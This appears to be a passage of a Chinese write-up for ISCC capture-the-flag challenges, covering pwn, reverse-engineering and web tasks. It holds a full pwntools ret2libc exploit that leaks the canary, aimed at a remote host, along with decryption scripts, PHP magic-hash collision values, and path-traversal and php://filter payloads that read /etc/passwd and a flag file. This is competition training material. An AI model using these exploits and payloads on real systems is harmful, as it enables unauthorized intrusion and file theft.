        \u683c\u5f0f\u5316\u5b57\u7b26\u4e32\uff0c\u6574\u6570\u622a\u65ad\u548c\u6ea2\u51fa\uff0cprintf(nbytes_4) \u6709\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\uff0c\u8f93\u5165 %44$p,%45$p,%46$p,%47$p \u6cc4\u9732 Canary\u3002<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u6574\u6570\u622a\u65ad<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        (unsigned __int8)nbytes <= 3u \u5728\u6821\u9a8c\u6570\u91cf\u65f6\uff0c\u6c47\u7f16\u5c42\u9762\u53ea\u6bd4\u8f83\u4e86 eax<\/code> \u7684\u6700\u4f4e 8 \u4f4d\uff08 al<\/code> \u5bc4\u5b58\u5668\uff09\u3002\u8f93\u5165 512\uff08\u5341\u516d\u8fdb\u5236 0x200<\/code>\uff09\u65f6\uff0cal<\/code> \u4e3a 0x00<\/code>\uff0c\u7ed5\u8fc7\u68c0\u67e5\uff0c0x4013BB\u8c03\u7528 read<\/code> \u65f6\uff0c\u4f20\u5165\u7684\u957f\u5ea6\u53c2\u6570\uff08edx<\/code>\uff09\u53c8\u662f\u5b8c\u6574\u7684 512\uff0c\u5bfc\u81f4\u7a81\u7834\u4e86\u539f\u672c\u6808\u53d8\u91cf\u7684\u7a7a\u95f4\u53d1\u751f\u6ea2\u51fa\u3002<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u7b2c\u4e00\u6b21\u6ea2\u51fa\u6253 ROP\uff0c\u7528 puts \u6cc4\u9732 puts \u7684 GOT \u8868\u5730\u5740\uff0c\u63a5\u7740 ret \u56de main\u3002\nLibcSearcher \u7b97\u51fa libc \u57fa\u5740\u548c system\u3001\/bin\/sh\u3002\n\u7b2c\u4e8c\u6b21\u6ea2\u51fa\u6253 system\uff0c\u6ce8\u610f Ubuntu \u9ad8\u7248\u672c system \u6709 movaps \u68c0\u67e5\uff0cROP \u94fe\u91cc\u591a\u585e\u4e2a ret \u6ed1\u677f\u6307\u4ee4\u5bf9\u9f50 16 \u5b57\u8282 RSP\u3002<\/code><\/pre>\n\n\n\n
        exp.py<\/p>\n\n\n\n
        from pwn import *\nfrom LibcSearcher import *\n\ncontext.arch = 'amd64'\n\ne = ELF('.\/attachment-16')\nr = remote('39.96.193.120', 33334)\n\nr.recvuntil(b\"ID:n\")\nr.send(b\"%44$p,%45$p,%46$p,%47$pn\")\nr.recvuntil(b\"Welcome, \")\nlk = r.recvline().strip().split(b',')\n\ncnry = 0\nfor x in lk:\n    if x.endswith(b'00') and len(x) >= 15:\n        cnry = int(x, 16)\n        break\n\nr.recvuntil(b\"need:n\")\nr.sendline(b\"512\")\nr.recvuntil(b\"need:n\")\n\nprdi = 0x4014a3\nret = 0x4014a4\n\np1 = b\"A\" * 264 + p64(cnry) + b\"B\" * 8\np1 += p64(prdi) + p64(e.got['puts']) + p64(e.plt['puts']) + p64(e.sym['main'])\n\nr.send(p1)\nr.recvuntil(b\"confirmed!n\")\n\nleak = u64(r.recvline().strip(b'n').ljust(8, b'x00'))\n\nlibc = LibcSearcher(\"puts\", leak)\nl_base = leak - libc.dump(\"puts\")\nsys = l_base + libc.dump(\"system\")\nsh = l_base + libc.dump(\"str_bin_sh\")\n\nr.recvuntil(b\"ID:n\")\nr.send(b\"sanjiun\")\nr.recvuntil(b\"need:n\")\nr.sendline(b\"512\")\nr.recvuntil(b\"need:n\")\n\np2 = b\"A\" * 264 + p64(cnry) + b\"B\" * 8\np2 += p64(ret) + p64(prdi) + p64(sh) + p64(sys)\n\nr.send(p2)\nr.interactive()<\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        REVERSE<\/h2>\n\n\n\n
        where’s bunny<\/h3>\n\n\n\n
        main \u51fd\u6570<\/p>\n\n\n\n
        \u591a\u5c42\u5957\u5a03\u52a0\u5bc6\u3002\n\u601d\u8def\uff1a\n\u683c\u5f0f\u6821\u9a8c\uff1a\u5f00\u5934\u68c0\u67e5\u4e86\u8f93\u5165\u5fc5\u987b\u662f ISCC{...}\uff0c\u62ff\u4e2d\u95f4\u7684\u5185\u5bb9\u53bb\u52a0\u5bc6\u3002\n\u63d0\u53d6\u5bc6\u94a5\uff1a\u7a0b\u5e8f\u6709\u4e00\u7ec4\u5199\u6b7b\u7684\u6590\u6ce2\u90a3\u5951\u6570\u7ec4 [5, 344, 13, 21, 34, 55, 89, 144, 233, 377]\u3002\u5f80\u4e0b\u770b\u6709\u4e2a\u6a21\u8fd0\u7b97\u5faa\u73af\u8fc7\u6ee4\uff0c\u7b97\u4e00\u4e0b\u4f1a\u53d1\u73b0\u53ea\u6709\u7d22\u5f15 1\u30013\u30016\u30018 \u88ab\u4fdd\u7559\u4e86\u3002\u4e5f\u5c31\u662f\u62bd\u51fa\u4e864\u4e2a\u5bc6\u94a5\u4e32\uff1a\"344\", \"21\", \"89\", \"233\"\u3002<\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u56db\u8f6e\u52a0\u5bc6\uff08\u4e3b\u8981\u90e8\u5206\uff09\uff1a
        \u770b v31 \u7684\u56db\u4e2a\u5206\u652f\u5bf9\u5e94\u8c03\u7528\u7684\u5b50\u51fd\u6570\uff1a\u7b2c\u4e00\u8f6e (v31 == 1)\uff1asub_401FF0\uff0c\u521d\u59cb\u5316256\u5b57\u8282\u6570\u7ec4\u3001\u5f02\u6216\u66ff\u6362\uff0c\u5f88\u660e\u663e\u7684 RC4\u3002\u5bc6\u94a5 “344”\u3002<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u7b2c\u4e8c\u8f6e (v31 == 2)\uff1asub_402370\uff0c\u6309\u4f4d\u5f02\u6216\uff0c\u4e5f\u5c31\u662f XOR\u3002\u5bc6\u94a5 “21”\u3002<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u7b2c\u4e09\u8f6e (v31 == 3)\uff1asub_402410\uff0c\u52a0\u4e0a\u5bc6\u94a5\u7684ASCII\u503c\uff0c\u5c31\u662f ADD\u3002\u5bc6\u94a5 “89”\u3002<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u7b2c\u56db\u8f6e (v31 == 4)\uff1a\u5148\u5bf9 “233” \u505a\u4e86 SHA-256 (sub_401AC0) \u53d6\u524d16\u5b57\u8282\uff0c\u7136\u540e\u8fdb\u4e86 sub_401B80\u3002\u770b\u5230\u9b54\u6570 -0x61C88647 (\u7b49\u4e8e 0x9E3779B9) \u548c\u4f4d\u79fb\u64cd\u4f5c\uff0c\u786e\u5b9a\u662f TEA \u7b97\u6cd5\u3002<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u5bc6\u6587\u6bd4\u5bf9\uff1a \u6700\u7ec8\u8ddf\u5341\u516d\u8fdb\u5236\u4e32 09132C7A4D010F23FDCA76720D8DE1C4AAEEF11F5F3E7265 \u6bd4\u8f83\u3002<\/p>\n\n\n\n
        exp.py<\/p>\n\n\n\n
        import struct\nimport hashlib\n\ndef tea_decrypt(data, key):\n    k = struct.unpack('<4I', key)\n    out = bytearray()\n    for i in range(0, len(data), 8):\n        v0, v1 = struct.unpack('<2I', data[i:i+8])\n        delta = 0x9e3779b9\n        sum_val = (delta * 32) & 0xffffffff\n        for _ in range(32):\n            v1 = (v1 - (((v0 << 4) + k[2]) ^ (v0 + sum_val) ^ ((v0 >> 5) + k[3]))) & 0xffffffff\n            v0 = (v0 - (((v1 << 4) + k[0]) ^ (v1 + sum_val) ^ ((v1 >> 5) + k[1]))) & 0xffffffff\n            sum_val = (sum_val - delta) & 0xffffffff\n        out += struct.pack('<2I', v0, v1)\n    return out\n\ndef rc4_decrypt(data, key):\n    S = list(range(256))\n    j = 0\n    for i in range(256):\n        j = (j + S[i] + key[i % len(key)]) % 256\n        S[i], S[j] = S[j], S[i]\n    i = j = 0\n    out = bytearray()\n    for char in data:\n        i = (i + 1) % 256\n        j = (j + S[i]) % 256\n        S[i], S[j] = S[j], S[i]\n        out.append(char ^ S[(S[i] + S[j]) % 256])\n    return out\n\nct = bytes.fromhex(\"09132C7A4D010F23FDCA76720D8DE1C4AAEEF11F5F3E7265\")\ntea_key = hashlib.sha256(b\"233\").digest()[:16]\n\npt1 = tea_decrypt(ct, tea_key)\n\nkey_add = b\"89\"\npt2 = bytearray()\nfor i in range(len(pt1)):\n    pt2.append((pt1[i] - key_add[i % len(key_add)]) & 0xFF)\n\nkey_xor = b\"21\"\npt3 = bytearray()\nfor i in range(len(pt2)):\n    pt3.append(pt2[i] ^ key_xor[i % len(key_xor)])\n\nkey_rc4 = b\"344\"\nflag_inner = rc4_decrypt(pt3, key_rc4)\n\nprint(f\"ISCC{{{flag_inner.decode('utf-8', errors='ignore')}}}\")<\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        ISCC{owlctlioIuydyrIauahlese}<\/code><\/pre>\n\n\n\n
        Dual Protection<\/h3>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u4e3b\u51fd\u6570\u5728 0x401100<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u5df2\u7ecf\u80fd\u770b\u51fa\u6700\u591a\u8bfb 36 \u4e2a\u5b57\u7b26\u3002\u540e\u9762\u7a0b\u5e8f\u81ea\u5df1\u53c8\u7b97\u4e86\u4e00\u904d\u957f\u5ea6\uff1a<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        0x24 = 36<\/code>\uff0c\u4e5f\u5c31\u662f\u8bf4\u8f93\u5165\u957f\u5ea6\u5fc5\u987b\u6b63\u597d\u662f 36\u3002<\/p>\n\n\n\n
        \u63a5\u4e0b\u6765 main \u91cc\u628a 3 \u4e2a\u51fd\u6570\u5730\u5740\u5f02\u6216\u4fdd\u5b58\uff1a<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u7136\u540e\u53cc\u5c42\u5faa\u73af\u8c03\u7528\uff1a<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u5916\u5c42\u5faa\u73af\u904d\u5386 36 \u6b21\uff0c\u5185\u5c42\u5faa\u73af 3 \u6b21\uff0c\u4f9d\u6b21\u8c03\u7528 sub_401000\u3001sub_401050\u548csub_4010D0\u5bf9\u8f93\u5165\u9010\u5b57\u8282\u5904\u7406\u3002\u53c2\u6570\u662f (buf, i)\n\u6240\u4ee5\u6bcf\u4e2a\u5b57\u7b26\u90fd\u4f1a\u8fde\u7eed\u7ecf\u8fc7\u8fd9 3 \u4e2a\u51fd\u6570\u5904\u7406\u3002<\/code><\/pre>\n\n\n\n
        \u51fd\u6570\u5206\u6790<\/p>\n\n\n\n
        sub_401000<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u53c2\u6570 a1 \u662f\u5b57\u7b26\u4e32\u57fa\u5740\uff0ca2 \u662f\u5f53\u524d\u4e0b\u6807 i\u3002\u8fd9\u5768\u4f4d\u8fd0\u7b97\u672c\u8d28\u5c31\u662f 8 \u4f4d\u4e0b\u7684\u5faa\u73af\u5de6\u79fb\uff08ROL 2\uff09\u3002\u903b\u8f91\u4e3a\uff1a\u5148\u5f02\u6216 0x55\uff0c\u7136\u540e\u5faa\u73af\u5de6\u79fb 2 \u4f4d\uff0c\u6700\u540e\u52a0\u4e0a\u5f53\u524d\u4e0b\u6807 i\u3002<\/code><\/pre>\n\n\n\n
        sub_401050<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u5b9a\u4e49\u4e86\u4e00\u4e2a 8 \u5b57\u8282\u786c\u7f16\u7801 key\uff08\u8f6c\u5341\u516d\u8fdb\u5236\u5373 0x12, 0x34, 0x56, 0x78, 0x90, 0xAB, 0xCD, 0xEF\uff09\u3002\u5f53\u524d\u5b57\u7b26\u5148\u548c key[i % 8] \u5f02\u6216\uff0c\u518d\u52a0\u4e0a 127 (0x7F)\u3002<\/code><\/pre>\n\n\n\n
        sub_4010D0<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u5f53\u524d\u5b57\u7b26\u5f02\u6216 (i + 0x20)<\/code><\/pre>\n\n\n\n
        main \u540e\u534a\u6bb5,\u53cd\u8c03\u8bd5\u548c\u52a8\u6001\u89e3\u5bc6<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u8fd9\u91cc\u5c31\u662f\u7b2c\u4e00\u5c42\u4fdd\u62a4\u3002\u6b63\u5e38\u8fd0\u884c\u65f6\u79cd\u5b50\u662f 0xDEADBEEF<\/code>\u3002\u5982\u679c\u6302\u8c03\u8bd5\u5668\uff0c\u79cd\u5b50\u6539\u6210 0x0BADF00D<\/code>\uff0c\u90a3\u540e\u9762\u89e3\u5bc6\u51fa\u6765\u7684\u51fd\u6570\u5c31\u4e0d\u5bf9\u4e86\u3002<\/p>\n\n\n\n
        \u63a5\u7740\u662f\u7533\u8bf7\u5185\u5b58\u3001\u62f7\u8d1d\u5bc6\u6587\uff1a<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        0x46 * 4 = 0x118\uff0c\u8bf4\u660e\u4ece unk_40FEE0 \u5f00\u59cb\u62f7\u4e86 0x118 \u5b57\u8282\u3002<\/code><\/pre>\n\n\n\n
        \u7136\u540e\u662f\u89e3\u5bc6\uff1a<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u6700\u540e\u628a\u89e3\u5bc6\u540e\u7684\u5185\u5b58\u5f53\u51fd\u6570\u8c03\u7528\uff1a<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u4f20\u8fdb\u53bb\u7684\u53c2\u6570\u5c31\u662f\u524d\u9762\u90a3 36 \u5b57\u8282\u53d8\u6362\u540e\u7684\u8f93\u5165\u3002<\/p>\n\n\n\n
        \u6574\u4f53\u5c31\u662f<\/p>\n\n\n\n
        seed = 0xDEADBEEF;\nCheckRemoteDebuggerPresent(GetCurrentProcess(), &isDebuggerPresent);\nif ( isDebuggerPresent )\n    seed = 0xBADF00D;\n\nmem = VirtualAlloc(0, 0x118, 0x3000, 0x40);\nmemcpy(mem, unk_40FEE0, 0x118);\n\nfor ( int j = 0; j < 0x118; ++j )\n{\n    seed = seed * 0x19660D + 0x3C6EF35F;\n    mem[j] ^= (seed >> 24) & 0xFF;\n}\n((void (*)(char *))mem)(buf);<\/code><\/pre>\n\n\n\n
        CheckRemoteDebuggerPresent<\/code> \u63a2\u67e5\u8c03\u8bd5\u5668\u3002\u6b63\u5e38\u8dd1\u79cd\u5b50\u662f 0xDEADBEEF<\/code>\uff0c\u88ab\u8c03\u4e86\u5c31\u7ed9\u5047\u79cd\u5b50 0x0BADF00D<\/code>\uff0c\u7533\u8bf7\u4e86\u4e00\u5757 0x118<\/code> \u5b57\u8282\u7684\u5185\u5b58\uff0c\u628a unk_40FEE0<\/code> \u7684\u6570\u636e\u62f7\u8fdb\u53bb\uff0c\u7528\u5178\u578b\u7684 LCG (\u7ebf\u6027\u540c\u4f59) \u7b97\u6cd5\u6309\u5b57\u8282\u89e3\u5bc6\u8fd9\u6bb5\u5185\u5b58\uff0c\u5c06\u5bc6\u6587\u6307\u9488 buf<\/code> \u4f5c\u4e3a\u53c2\u6570\u4f20\u8fdb\u53bb\u5e76\u6267\u884c\u3002<\/p>\n\n\n\n
        \u5bc6\u6587<\/p>\n\n\n\n
        \u628a unk_40FEE0\u5904\u7684\u6570\u636e\u7528\u6b63\u786e\u7684 seed (0xDEADBEEF) \u8fd8\u539f\u51fa\u6765\u540e\uff0c\u8f6c\u6210\u6c47\u7f16\u770b<\/p>\n\n\n\n
        shift+f2<\/p>\n\n\n\n
        import ida_bytes\n\nstart_addr = 0x40FEE0\nsize = 0x118\nseed = 0xDEADBEEF\n\nfor i in range(size):\n    seed = (seed * 0x19660D + 0x3C6EF35F) & 0xFFFFFFFF\n    val = (seed >> 24) & 0xFF\n\n    orig_byte = ida_bytes.get_original_byte(start_addr + i)\n    ida_bytes.patch_byte(start_addr + i, orig_byte ^ val)\n\nprint(\"[+] unk_40FEE0 SMC \u6570\u636e\u89e3\u5bc6\u5b8c\u6210\uff01\")<\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u7136\u540e0040FEE0 unk_40FEE0 \u8f6c\u6210\u6c47\u7f16\u6309C<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u610f\u601d\uff1a<\/p>\n\n\n\n
        cl = 0;\ncl |= buf[0] ^ 0xC1;\ncl |= buf[1] ^ 0x8D;\ncl |= buf[2] ^ 0xA9;\n...\ncl |= buf[35] ^ 0x79;\nreturn cl == 0;<\/code><\/pre>\n\n\n\n
        \u6240\u4ee5\u4e09\u8f6e\u53d8\u6362\u540e\u7684\u8f93\u5165\u5fc5\u987b\u4e25\u683c\u7b49\u4e8e\u8fd9 36 \u5b57\u8282\uff1a<\/p>\n\n\n\n
        target = [\n    0xC1,0x8D,0xA9,0x81,0x8F,0x0D,0xEF,0x34,\n    0x8D,0x99,0xD5,0x74,0xEB,0x40,0xB4,0x3C,\n    0x35,0x61,0x0D,0x10,0x7B,0x58,0x64,0x2C,\n    0x25,0x50,0x06,0x3D,0xF4,0xAC,0xC3,0x99,\n    0x3E,0x1C,0xF9,0x79\n]<\/code><\/pre>\n\n\n\n
        \u6211\u4eec\u524d\u5411\u53d8\u6362\u662f\uff1a<\/p>\n\n\n\n
        x = ch;\nx = rol(x ^ 0x55, 2);\nx = (x + i) & 0xff;\nx = x ^ key[i % 8];\nx = (x + 0x7f) & 0xff;\nx = x ^ (i + 0x20);\n\n\u90a3\u5c31\u9006\u7740\u6765\uff1a\nx = target[i];\nx ^= (i + 0x20);\nx = (x - 0x7f) & 0xff;\nx ^= key[i % 8];\nx = (x - i) & 0xff;\nx = ror(x, 2);\nx ^= 0x55;<\/code><\/pre>\n\n\n\n
        exp.py<\/p>\n\n\n\n
        target = [\n    0xC1,0x8D,0xA9,0x81,0x8F,0x0D,0xEF,0x34,\n    0x8D,0x99,0xD5,0x74,0xEB,0x40,0xB4,0x3C,\n    0x35,0x61,0x0D,0x10,0x7B,0x58,0x64,0x2C,\n    0x25,0x50,0x06,0x3D,0xF4,0xAC,0xC3,0x99,\n    0x3E,0x1C,0xF9,0x79\n]\n\nkey = [0x12,0x34,0x56,0x78,0x90,0xAB,0xCD,0xEF]\n\ndef ror(x, n):\n    return ((x >> n) | (x << (8 - n))) & 0xff\n\nans = []\nfor i, x in enumerate(target):\n    x ^= (i + 0x20) & 0xff\n    x = (x - 0x7f) & 0xff\n    x ^= key[i % 8]\n    x = (x - i) & 0xff\n    x = ror(x, 2)\n    x ^= 0x55\n    ans.append(x)\n\nprint(bytes(ans).decode())<\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u4e00\u628a\u68ad\u811a\u672c<\/p>\n\n\n\n
        import pathlib\nimport struct\n\ndef rva_to_offset(data, rva):\n    pe = struct.unpack_from('<I', data, 0x3C)[0]\n    num = struct.unpack_from('<H', data, pe + 6)[0]\n    opt = struct.unpack_from('<H', data, pe + 20)[0]\n    sec = pe + 24 + opt\n    for i in range(num):\n        off = sec + i * 40\n        vsize, vaddr, rsize, roff = struct.unpack_from('<IIII', data, off + 8)\n        size = max(vsize, rsize)\n        if vaddr <= rva < vaddr + size:\n            return roff + (rva - vaddr)\n    raise ValueError('rva not found')\n\ndef decrypt_stub(data):\n    off = rva_to_offset(data, 0xFEE0)\n    buf = bytearray(data[off:off + 0x118])\n    seed = 0xDEADBEEF\n    for i in range(len(buf)):\n        seed = (seed * 0x19660D + 0x3C6EF35F) & 0xFFFFFFFF\n        buf[i] ^= (seed >> 24) & 0xFF\n    return bytes(buf)\n\ndef get_target(stub):\n    target = []\n    i = 0\n    while i < len(stub) - 5 and len(target) < 36:\n        if stub[i:i + 4] == b'x8ax46' + bytes([len(target)]) + b'x34':\n            target.append(stub[i + 4])\n            i += 5\n        else:\n            i += 1\n    if len(target) != 36:\n        raise ValueError('target not found')\n    return target\n\ndef ror(x, n):\n    return ((x >> n) | (x << (8 - n))) & 0xFF\n\ndef solve(target):\n    key = [0x12, 0x34, 0x56, 0x78, 0x90, 0xAB, 0xCD, 0xEF]\n    out = []\n    for i, x in enumerate(target):\n        x ^= (i + 0x20) & 0xFF\n        x = (x - 0x7F) & 0xFF\n        x ^= key[i & 7]\n        x = (x - i) & 0xFF\n        x = ror(x, 2)\n        x ^= 0x55\n        out.append(x)\n    return bytes(out).decode()\n\ndef main():\n    exes = sorted(pathlib.Path('.').glob('*.exe'))\n    if not exes:\n        raise SystemExit('no exe found')\n    data = exes[0].read_bytes()\n    stub = decrypt_stub(data)\n    target = get_target(stub)\n    print(solve(target))\n\nif __name__ == '__main__':\n    main()\n<\/code><\/pre>\n\n\n\n
        ISCC{*5H^jf6f[gNt`t'^YWBH$!l:r0?&'G}<\/code><\/pre>\n\n\n\n
        Web<\/h2>\n\n\n\n
        \u6d88\u5931\u7684\u5bc6\u94a5<\/h3>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u9898\u76ee\u63cf\u8ff0\u53d1\u73b0\u5bf9key\u654f\u611f \u6240\u4ee5\u8f93\u5165key<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u53d1\u73b0\u88ab\u8fc7\u6ee4\u4e86<\/p>\n\n\n\n
        \u53cc\u5199\u7ed5\u8fc7 \u5c31\u884c:\u8f93\u5165kekeyy<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u53d1\u73b0\u63d0\u793a\u9700\u8981 POST \u7684 a<\/code> \u4e3a\u6570\u7ec4\u7c7b\u578b<\/p>\n\n\n\n
        POST: a[key]=1337<\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u63d0\u793a\u9700\u8981 GET \u53c2\u6570 a \u548c`b \u901a\u8fc7 hash collision \u6821\u9a8c\u3002<\/p>\n\n\n\n
        PHP \u4e2d md5()\u8fd4\u56de\u4ee5 0e\u5f00\u5934\u4e14\u540e\u7eed\u5168\u4e3a\u6570\u5b57\u7684\u5b57\u7b26\u4e32\u65f6\uff0c==\u677e\u6563\u6bd4\u8f83\u4f1a\u5c06\u5176\u89c6\u4e3a\u79d1\u5b66\u8ba1\u6570\u6cd5 0\uff0c\u5373 0 == 0\u4e3a true\u3002<\/p>\n\n\n\n
        QNKCDZO \u2192 md5 = 0e830400451993494058024219903391\n240610708 \u2192 md5 = 0e462097431906509019562988736854<\/code><\/pre>\n\n\n\n
        \u6700\u7ec8\u5448\u73b0<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        ISCC{QN-tGwW0yZD4!1fQ?TXJ0b0)bUag8i}<\/code><\/pre>\n\n\n\n
        JSON Beautifier<\/h3>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u7b80\u5355\u76ee\u5f55\u679a\u4e3e<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u8bf4\u660e\u6709\u76ee\u5f55\u7a7f\u8d8a<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u8ba9\u4f60\u7528data_uri<\/code> \u6a21\u5f0f<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        -POST \/api\/beautify.php\n-GET \/api\/preview.php?file=<preview_id>.tmp\n\u5224\u65ad\uff1a\n-beautify.php \u8d1f\u8d23\u63a5\u6536\u63d0\u4ea4\u7684\u6570\u636e\uff0c\u5e76\u751f\u6210\u9884\u89c8\u6587\u4ef6\u3002\n-preview.php \u8d1f\u8d23\u6839\u636e file\u53c2\u6570\uff0c\u628a\u751f\u6210\u540e\u7684\u4e34\u65f6\u6587\u4ef6\u8bfb\u51fa\u6765\u7ed9\u7528\u6237\u770b\u3002\n\n\u8fd9\u79cd\u7ed3\u6784\u672c\u8eab\u5c31\u5f88\u5bb9\u6613\u6709\u6f0f\u6d1e\uff0c\u56e0\u4e3a\u7528\u6237\u53ef\u63a7\u7684\u6587\u4ef6\u540d\u53c2\u6570 + \u670d\u52a1\u7aef\u8bfb\u6587\u4ef6\u662fLFI\/\u8def\u5f84\u62fc\u63a5\u68c0\u67e5\u70b9\u3002<\/code><\/pre>\n\n\n\n
        \u53d1\u4e00\u4e2a\u6700\u666e\u901a\u7684\u8bf7\u6c42<\/p>\n\n\n\n
        {\"data\":\"{\"a\":1}\",\"preview_type\":\"raw\"}<\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u8bbf\u95ee<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u53ef\u4ee5\u77e5\u9053\uff0cpreview.php<\/code> \u7684 file<\/code> \u53c2\u6570\u4f1a\u5f71\u54cd\u670d\u52a1\u7aef\u5b9e\u9645\u8bfb\u53d6\u7684\u6587\u4ef6\u3002<\/p>\n\n\n\n
        \u6d4b\u8bd5\u76ee\u5f55\u7a7f\u8d8a<\/p>\n\n\n\n
        http://39.105.213.28:49102\/api\/preview.php?file=..\/..\/etc\/passwd<\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u8bf7\u6c42\u5df2\u6709\u7cfb\u7edf\u6587\u4ef6\uff0c\u5982 ..\/..\/etc\/passwd\uff0c\u8fd4\u56de\u7684\u662f 403 Forbidden\n\u8bf7\u6c42\u4ec0\u4e48\u9875\u6ca1\u6709\u8fd4\u56de\u662f404<\/code><\/pre>\n\n\n\n
        \u53ef\u4ee5\u77e5\u9053<\/p>\n\n\n\n
        403 = \u6587\u4ef6\u5927\u6982\u7387\u5b58\u5728\uff0c\u4f46\u88ab\u62e6\u622a\u3002\n404 = \u6587\u4ef6\u4e0d\u5b58\u5728\uff0c\u6216\u8005\u8def\u5f84\u6ca1\u547d\u4e2d\u3002<\/code><\/pre>\n\n\n\n
        \u627e flag \u5728\u54ea<\/p>\n\n\n\n
        \u7ed3\u679c\u8fd9\u4e2aflag\u76ee\u5f55\u6211\u60f3\u77e5\u9053\u8c01\u53ef\u4ee5\u731c\u5230\uff1f\u5bf9\u51fa\u9898\u4eba\u771f\u65e0\u8bed\u4e86\uff0c\u8fd9\u4e2a\u76ee\u5f55\u8fd8\u662fAi\u51fa\u6765\u7684\uff0c\u731c\u76ee\u5f55\uff0c\u795e\u4e86\uff0c\u6211\u4f30\u8ba1\u9898\u76ee\u662fAi\u51fa\u7684\u51fa\u9898\u4eba\u90fd\u6ca1\u6709\u770b\u8fd9\u4e2aflag\u76ee\u5f55\u5728\u54ea\u91cc\u5427\uff0c\u65e0\u8bed\u4e86<\/p>\n\n\n\n
        \/api\/preview.php?file=..\/..\/proc\/self\/root\/secret\/flag<\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u628a\u5185\u5bb9\u8bfb\u51fa\u6765\u5c31\u884c\uff0cflag\u5728\/secret\/flag<\/p>\n\n\n\n
        data_uri<\/p>\n\n\n\n
        \u628a data URI \u89e3\u6790\u540e\u518d\u843d\u76d8\u3002\n\u628a data URI \u91cc\u7684\u5185\u5bb9\u8fdb\u4e00\u6b65\u5f53\u6210\u8d44\u6e90\u5f15\u7528\u5904\u7406\u3002\n\u5bf9 URI scheme \u505a\u4e86\u534a\u622a\u6821\u9a8c\uff0c\u4f46\u6ca1\u6709\u5b8c\u5168\u5c01\u4f4f\u3002<\/code><\/pre>\n\n\n\n
        \u770bdata_uri\uff0c\u7406\u89e3\u5b83\u5c31\u662f\u628a base64 \u89e3\u7801\u540e\u5199\u5230\u9884\u89c8\u6587\u4ef6\u91cc\uff0c\u4f46\u8fd9\u91cc\u6709\u4e2a\u5947\u602a\u7684\u5185\u5bb9\uff1a<\/p>\n\n\n\n
        \u5982\u679c\u4f60\u63d0\u4ea4\u7684\u5185\u5bb9\u662f\u666e\u901a\u6587\u672c\uff0c\u5b83\u4f1a\u539f\u6837\u663e\u793a\uff0c\u6bd4\u5982\u63d0\u4ea4\uff1a<\/p>\n\n\n\n
        ..\/..\/proc\/self\/root\/secret\/flag<\/code><\/pre>\n\n\n\n
        \u9884\u89c8\u51fa\u6765\u8fd8\u662f\u8fd9\u4e32\u6587\u672c\u672c\u8eab\u3002\u4f46\u5982\u679c\u63d0\u4ea4\u7684\u662f\u7c7b\u4f3c\u4e0b\u9762\u8fd9\u79cd\uff1a<\/p>\n\n\n\n
        php:\/\/filter\/convert.base64-encode\/resource=..\/..\/proc\/self\/root\/secret\/flag<\/code><\/pre>\n\n\n\n
        \u9884\u89c8\u7ed3\u679c\u4e0d\u662f\u539f\u6587\uff0c\u800c\u662f\uff1a<\/p>\n\n\n\n
        Forbidden resource<\/code><\/pre>\n\n\n\n
        \u518d\u8bd5\u522b\u7684 scheme\uff1a<\/p>\n\n\n\n
        http:\/\/127.0.0.1\/ -> Forbidden scheme\uff0cfile:\/\/\/etc\/hostname -> Bad reference<\/code><\/pre>\n\n\n\n
